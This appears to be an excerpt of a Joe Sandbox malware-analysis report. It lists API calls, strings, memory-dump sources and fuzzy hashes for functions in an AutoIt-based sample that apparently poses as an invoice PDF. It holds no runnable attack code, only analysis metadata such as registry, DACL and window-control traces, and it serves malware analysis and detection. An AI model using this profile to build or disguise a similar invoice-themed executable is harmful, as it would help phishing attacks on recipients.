SELECTCLEAR, xrefs: 004A052D
GETITEMCOUNT, xrefs: 004A0316, 004A0337
GETSELECTED, xrefs: 004A05E1
GETSELECTEDCOUNT, xrefs: 004A0470, 004A048B
SELECTALL, xrefs: 004A0515
SELECT, xrefs: 004A0548
ISSELECTED, xrefs: 004A04DD
GETSUBITEMCOUNT, xrefs: 004A0384, 004A039F
VIEWCHANGE, xrefs: 004A0675
GETTEXT, xrefs: 004A03EC, 004A0407
DESELECT, xrefs: 004A059C
FINDITEM, xrefs: 004A0627

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 8bae7d9e2864a4c7ddbb3d1f7814e8f1ae5bb241f1fc9bbb8b66333534eb2381
Instruction ID: 18ae399115aa6f0accb2650a70511161145c9c3628812edb00ffb1e0d68a9a9c
Opcode Fuzzy Hash: 8bae7d9e2864a4c7ddbb3d1f7814e8f1ae5bb241f1fc9bbb8b66333534eb2381
Instruction Fuzzy Hash: 9FE1D3312082009FC714DF25C55096BB3E2BFA9718F54496FF8969B391D738ED45CB8A

Function 00428891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00428968
GetSystemMetrics.USER32(00000007), ref: 00428970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0042899B
GetSystemMetrics.USER32(00000008), ref: 004289A3
GetSystemMetrics.USER32(00000004), ref: 004289C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 004289E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 004289F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00428A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00428A3C
GetClientRect.USER32(00000000,000000FF), ref: 00428A5A
GetStockObject.GDI32(00000011), ref: 00428A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00428A81

Part of subcall function 0042912D: GetCursorPos.USER32(?), ref: 00429141
Part of subcall function 0042912D: ScreenToClient.USER32(00000000,?), ref: 0042915E
Part of subcall function 0042912D: GetAsyncKeyState.USER32(00000001), ref: 00429183
Part of subcall function 0042912D: GetAsyncKeyState.USER32(00000002), ref: 0042919D

SetTimer.USER32(00000000,00000000,00000028,004290FC), ref: 00428AA8

Strings

AutoIt v3 GUI, xrefs: 00428A20

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: b0d444c9a4e648238a9ee43033c73ecde41753783aa0494a8d7b3f174e1e979a
Instruction ID: f0d2f4109e6c040b0ed59e70fe219348a0646202f3286822d3bfbae8bd7143cb
Opcode Fuzzy Hash: b0d444c9a4e648238a9ee43033c73ecde41753783aa0494a8d7b3f174e1e979a
Instruction Fuzzy Hash: 6DB1A171A002199FDB14DF68DC85BAE3BB5FB48315F11422AFA05EB290DB38E841CF59

Function 00470D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00471114
Part of subcall function 004710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00470B9B,?,?,?), ref: 00471120
Part of subcall function 004710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00470B9B,?,?,?), ref: 0047112F
Part of subcall function 004710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00470B9B,?,?,?), ref: 00471136
Part of subcall function 004710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0047114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00470DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00470E29
GetLengthSid.ADVAPI32(?), ref: 00470E40
GetAce.ADVAPI32(?,00000000,?), ref: 00470E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00470E96
GetLengthSid.ADVAPI32(?), ref: 00470EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00470EB5
HeapAlloc.KERNEL32(00000000), ref: 00470EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00470EDD
CopySid.ADVAPI32(00000000), ref: 00470EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00470F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00470F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00470F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00470F6E
HeapFree.KERNEL32(00000000), ref: 00470F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00470F7E
HeapFree.KERNEL32(00000000), ref: 00470F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00470F8E
HeapFree.KERNEL32(00000000), ref: 00470F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00470FA1
HeapFree.KERNEL32(00000000), ref: 00470FA8

Part of subcall function 00471193: GetProcessHeap.KERNEL32(00000008,00470BB1,?,00000000,?,00470BB1,?), ref: 004711A1
Part of subcall function 00471193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00470BB1,?), ref: 004711A8
Part of subcall function 00471193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00470BB1,?), ref: 004711B7

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: ad664e0038d737355d8e93589271598f1583315f857685ac41813197bac5a640
Instruction ID: 7099d9c0095d656a1b53d86a66b4f77c82821f2cff5746ffa2e987abacfeea12
Opcode Fuzzy Hash: ad664e0038d737355d8e93589271598f1583315f857685ac41813197bac5a640
Instruction Fuzzy Hash: 60714CB290520AEBDB20DFA5DC44BEFBBB8BF05300F148126F919B6291D7759905CF68

Function 0049C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0049C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,004ACC08,00000000,?,00000000,?,?), ref: 0049C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0049C5A4
_wcslen.LIBCMT ref: 0049C5F4
_wcslen.LIBCMT ref: 0049C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0049C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0049C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0049C84D
RegCloseKey.ADVAPI32(?), ref: 0049C881
RegCloseKey.ADVAPI32(00000000), ref: 0049C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0049C960

Strings

REG_QWORD, xrefs: 0049C8C3
REG_DWORD, xrefs: 0049C804
REG_SZ, xrefs: 0049C644
REG_EXPAND_SZ, xrefs: 0049C5CD
REG_MULTI_SZ, xrefs: 0049C6F5
REG_BINARY, xrefs: 0049C913

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 30b1e01ffc5a8ccd53bef9a9fb0a9981281c309e3bf9150cc88e55d46ec91384
Instruction ID: 4da2fe471f31ca3bfbd45d4141142f24a7ff825f6c59403002ef929b4aecf9e9
Opcode Fuzzy Hash: 30b1e01ffc5a8ccd53bef9a9fb0a9981281c309e3bf9150cc88e55d46ec91384
Instruction Fuzzy Hash: ED1280312042019FDB14DF15C491A6ABBE5FF88358F05886EF8499B3A2DB39FC41CB89

Function 004A091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 004A09C6
_wcslen.LIBCMT ref: 004A0A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004A0A54
_wcslen.LIBCMT ref: 004A0A8A
_wcslen.LIBCMT ref: 004A0B06
_wcslen.LIBCMT ref: 004A0B81

Part of subcall function 0042F9F2: _wcslen.LIBCMT ref: 0042F9FD

Part of subcall function 00472BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00472BFA

Strings

COLLAPSE, xrefs: 004A0B01, 004A0B1C
GETTOTALCOUNT, xrefs: 004A09F2, 004A0A17
GETSELECTED, xrefs: 004A0C4E
GETITEMCOUNT, xrefs: 004A0C1E
SELECT, xrefs: 004A0D11
EXISTS, xrefs: 004A0B7C, 004A0B97
UNCHECK, xrefs: 004A0D3E
ISCHECKED, xrefs: 004A0CE1
EXPAND, xrefs: 004A0BF8
GETTEXT, xrefs: 004A0C97
CHECK, xrefs: 004A0A85, 004A0AA0

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 0720a5bfdb4e81eb8932f2283124a063d73bb46e898ebb9025f98d16490c2fe7
Instruction ID: 71bb98aa1d0cb647c24a067f9355aa1627f251d85bc7f1c45857d5aefb18cbd5
Opcode Fuzzy Hash: 0720a5bfdb4e81eb8932f2283124a063d73bb46e898ebb9025f98d16490c2fe7
Instruction Fuzzy Hash: 13E1D1712083019FC714DF25C45096AB7E2BFA9318F50895FF8999B3A2D738ED45CB8A

Function 0049C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0049B6AE,?,?), ref: 0049C9B5
_wcslen.LIBCMT ref: 0049C9F1
_wcslen.LIBCMT ref: 0049CA68
_wcslen.LIBCMT ref: 0049CA9E
_wcslen.LIBCMT ref: 0049CAF9
_wcslen.LIBCMT ref: 0049CB2F
_wcslen.LIBCMT ref: 0049CB7F

Strings

HKEY_CLASSES_ROOT, xrefs: 0049CAF3, 0049CAF8
HKEY_LOCAL_MACHINE, xrefs: 0049CA62, 0049CA67
HKLM, xrefs: 0049CA98, 0049CA9D
HKCU, xrefs: 0049CBCE
HKEY_CURRENT_USER, xrefs: 0049CBBD
HKCC, xrefs: 0049CBAC
HKU, xrefs: 0049CBF0
HKCR, xrefs: 0049CB29, 0049CB2E
HKEY_CURRENT_CONFIG, xrefs: 0049CB79, 0049CB7E
HKEY_USERS, xrefs: 0049CBDF

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: bac4f9cd323f08682ec5b06894ef53aa53b38e830bd08fb05a1defae5ff1d7ed
Instruction ID: d5d863f6c86e870ab54e73c1e16bf93cde290a1e23b92c2b14424a1a4fa95069
Opcode Fuzzy Hash: bac4f9cd323f08682ec5b06894ef53aa53b38e830bd08fb05a1defae5ff1d7ed
Instruction Fuzzy Hash: 3071023260012A8BCF20DE78D9D16BF3B91AFA4764B50453BE85697384E63CDD8583AC

Function 004A833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004A835A
_wcslen.LIBCMT ref: 004A836E
_wcslen.LIBCMT ref: 004A8391
_wcslen.LIBCMT ref: 004A83B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 004A83F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004A5BF2), ref: 004A844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004A8487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 004A84CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004A8501
FreeLibrary.KERNEL32(?), ref: 004A850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 004A851D
DestroyIcon.USER32(?,?,?,?,?,004A5BF2), ref: 004A852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 004A8549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 004A8555

Strings

.exe, xrefs: 004A8388
.icl, xrefs: 004A8368
.dll, xrefs: 004A83AB

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: a0ba2eaa562fba035ce4f5868e329f6d95a4f8662d8f1f7125fc70b63ca8b933
Instruction ID: 87c3c71bab557bf3440b5ae3ca86f648046470f02ca5c71676a4d27e303ff600
Opcode Fuzzy Hash: a0ba2eaa562fba035ce4f5868e329f6d95a4f8662d8f1f7125fc70b63ca8b933
Instruction Fuzzy Hash: E061DF71900215BEEB14DF64CC81BFF7BA8FB19720F10451AF815DA1D1EB78A980CBA8

Function 00417778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#comments-start, xrefs: 0041785F, 004178B1
#ce, xrefs: 004178ED
#comments-end, xrefs: 004178D9
Unterminated group of comments, xrefs: 0045528C
#pragma compile, xrefs: 004177D3
#cs, xrefs: 00417873, 004178C5
Cannot parse #include, xrefs: 00455279
#include-once, xrefs: 0041782F
", xrefs: 00455153
#include, xrefs: 00417847
#OnAutoItStartRegister, xrefs: 00417817
#requireadmin, xrefs: 004177FF
Bad directive syntax error, xrefs: 0045519A
#notrayicon, xrefs: 004177E7
', xrefs: 00455169

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 6afb10f0198203f1410ecab66fefbd4d6f88f0d7704e88eaaef2ec0885fe103d
Instruction ID: 9163805a9ffd9d5412d66ca13c160e931ca9fb4f2aefb45c61f1c69912936ce9
Opcode Fuzzy Hash: 6afb10f0198203f1410ecab66fefbd4d6f88f0d7704e88eaaef2ec0885fe103d
Instruction Fuzzy Hash: B681F470A40605ABDB20AF61DC52FEF7B74AF15304F04402BF805AA292EB7CD985C79D

Function 00475A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00475A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00475A40
SetWindowTextW.USER32(?,?), ref: 00475A57
GetDlgItem.USER32(?,000003EA), ref: 00475A6C
SetWindowTextW.USER32(00000000,?), ref: 00475A72
GetDlgItem.USER32(?,000003E9), ref: 00475A82
SetWindowTextW.USER32(00000000,?), ref: 00475A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00475AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00475AC3
GetWindowRect.USER32(?,?), ref: 00475ACC
_wcslen.LIBCMT ref: 00475B33
SetWindowTextW.USER32(?,?), ref: 00475B6F
GetDesktopWindow.USER32 ref: 00475B75
GetWindowRect.USER32(00000000), ref: 00475B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00475BD3
GetClientRect.USER32(?,?), ref: 00475BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00475C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00475C2F

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 15b77cc3a12dcd2901aa2ecc5caedef83fd7d4d0605f2cc54582615693e99587
Instruction ID: d68c9926c70e6a31f208645eeaef471f8df6a7d1c520532eabc3135bfbba4c8e
Opcode Fuzzy Hash: 15b77cc3a12dcd2901aa2ecc5caedef83fd7d4d0605f2cc54582615693e99587
Instruction Fuzzy Hash: CE718231900B059FDB20DFA8CE85AAFBBF5FF48704F104529E146A66A0D7B4F944CB54

Function 004730F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0047318D
_wcslen.LIBCMT ref: 004731F8

Strings

INSTANCE, xrefs: 00473453
NAME, xrefs: 00473335, 00473346
[M, xrefs: 0047339A
CLASS, xrefs: 00473188, 004731A5
TEXT, xrefs: 0047347C
CLASSNN, xrefs: 004731F3, 00473204
REGEXPCLASS, xrefs: 00473255, 00473266

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[M
API String ID: 176396367-3897780819
Opcode ID: b96623a95b347f7aca3d4d8b97c3991ae9194941cbfa1ecd679a5c21578a44c8
Instruction ID: aa63f2a369256b94df989cc275171d9e3d6b15e2fc1709ac387eae9b27f71ea6
Opcode Fuzzy Hash: b96623a95b347f7aca3d4d8b97c3991ae9194941cbfa1ecd679a5c21578a44c8
Instruction Fuzzy Hash: 90E1E432A00516ABCB289F74C4517EEBBB0BF44715F54C12BE45AB7340DF38AE85A798

Function 004300C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 004300C6

Part of subcall function 004300ED: InitializeCriticalSectionAndSpinCount.KERNEL32(004E070C,00000FA0,B59DB5CB,?,?,?,?,004523B3,000000FF), ref: 0043011C
Part of subcall function 004300ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,004523B3,000000FF), ref: 00430127
Part of subcall function 004300ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,004523B3,000000FF), ref: 00430138
Part of subcall function 004300ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0043014E
Part of subcall function 004300ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0043015C
Part of subcall function 004300ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0043016A
Part of subcall function 004300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00430195
Part of subcall function 004300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004301A0

___scrt_fastfail.LIBCMT ref: 004300E7

Part of subcall function 004300A3: __onexit.LIBCMT ref: 004300A9

Strings

InitializeConditionVariable, xrefs: 00430148
SleepConditionVariableCS, xrefs: 00430154
kernel32.dll, xrefs: 00430133
WakeAllConditionVariable, xrefs: 00430162
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00430122

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 8424aec140013ab03561fba2c7cc318467006b6a89ece3e2d06ac802320f4b1a
Instruction ID: d4bd76f16599715a784a70480cebc38e1d83c7f5d8cb9fa6486302071be1f816
Opcode Fuzzy Hash: 8424aec140013ab03561fba2c7cc318467006b6a89ece3e2d06ac802320f4b1a
Instruction Fuzzy Hash: 2E21FC32B447106BDB116BA5AC55B6A77E4DB1AB61F10033BF801A7791DBBD5C008A9C

Function 004844C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,004ACC08), ref: 00484527
_wcslen.LIBCMT ref: 0048453B
_wcslen.LIBCMT ref: 00484599
_wcslen.LIBCMT ref: 004845F4
_wcslen.LIBCMT ref: 0048463F
_wcslen.LIBCMT ref: 004846A7

Part of subcall function 0042F9F2: _wcslen.LIBCMT ref: 0042F9FD

GetDriveTypeW.KERNEL32(?,004D6BF0,00000061), ref: 00484743

Strings

fixed, xrefs: 00484635, 0048463A
network, xrefs: 0048469D, 004846A2
ramdisk, xrefs: 004846F1
removable, xrefs: 004845EA, 004845EF
all, xrefs: 00484531, 00484536
unknown, xrefs: 00484708
cdrom, xrefs: 0048458F, 00484594

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

